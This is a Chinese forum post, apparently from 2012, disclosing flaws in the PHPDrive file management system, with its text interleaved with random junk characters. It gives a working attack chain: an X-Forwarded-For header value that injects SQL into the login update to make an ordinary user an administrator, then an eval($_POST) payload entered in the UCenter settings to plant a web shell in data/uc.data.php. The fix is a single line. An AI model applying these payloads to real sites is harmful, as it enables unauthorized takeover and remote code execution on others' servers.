PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等 z2 g4 a! H4 q3 u, C0 |8 n
( Q ?; g: H# i" P& n4 L( B
includes/user.lib.php' A/ ?2 X0 p* y7 V
行875 F! i& }6 t1 {& Z
function get_ip() {
9 }6 o( W5 }: j( w2 O if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];. z7 v* z6 K, P9 ?% `! t
在用户注册与登录 处module/disk/account.lead.php- J' H1 j& P. M
198行
- }; c3 I2 S1 b1 R8 P //更新本次登录IP和时间: @: ^; r0 F5 c1 y' z, V. `
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
) f, w3 H6 Q3 `, w由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
' a5 B7 J4 J: ]; {实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
3 J" J5 H; k0 g* F后台getshell:
1 P3 N A4 H1 m0 f$ P' [在UCenter设置处,将UC数据库登录名填写为$ Q; Q( v# U/ {8 W0 O
- S5 W" o) a1 H+ e3 o2 Z) s q
root’);eval($_POST[DisKill]);?>/*
5 F+ {' r. u& N, F/ J7 f可以得到一个shell,位置在 data/uc.data.php
/ F# Q5 Q3 d H5 [0 K- @. Y9 h$ P9 ? `
修复:过滤注入' m9 t1 c- k. F% K) `$ }+ ?
9 w, K- x2 z1 V
|
发表于 2012-12-31 09:18:34
收藏
支持
反对